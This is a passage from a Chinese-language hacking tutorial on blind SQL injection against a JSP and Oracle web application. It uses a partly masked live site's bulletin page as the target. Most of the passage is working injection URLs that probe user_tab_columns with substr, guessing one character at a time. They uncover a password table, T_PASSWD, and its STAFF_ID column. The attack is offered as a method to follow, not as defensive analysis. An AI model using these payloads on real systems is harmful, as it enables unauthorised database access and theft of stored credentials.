JSP+Oracle SQL Injection之旅

      得到有NAME这个字段对应的表的长度是8，继续猜到对应的表名：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where column_name like '%25PASS%25' and substr(table_name,1,1)='T') and '1'='1

　　它们会不会在同一个表里呢?看完下面就知道了。得到PASS对应表名第一个字符为T：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where column_name like '%25PASS%25' and substr(table_name,1,8)='T_PASSWD') and '1'='1

　　一个字符一个字符来猜，方法跟上面猜表的过程一样，只是前面多了一个条件“column_name like '%25PASS%25'”。最后得到这个表名为：T_PASSWD，接下来当然得把Like ID/NMAE/ PASSWD的列名猜完整：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,-2,2)='ID') and '1'='1

　　可以确定ID两个字符在最后面两个，大家可以改变Sbustr()里的值，慢慢缩小范围：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,1)='S') and '1'='1

　　得到第一个字符为S。

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,2)='ST') and '1'='1

　　第二个字符为T。

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,3)='STA') and '1'='1

　　第三个为A……直到第八个字符。

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,8)=' STAFF_ID ') and '1'='1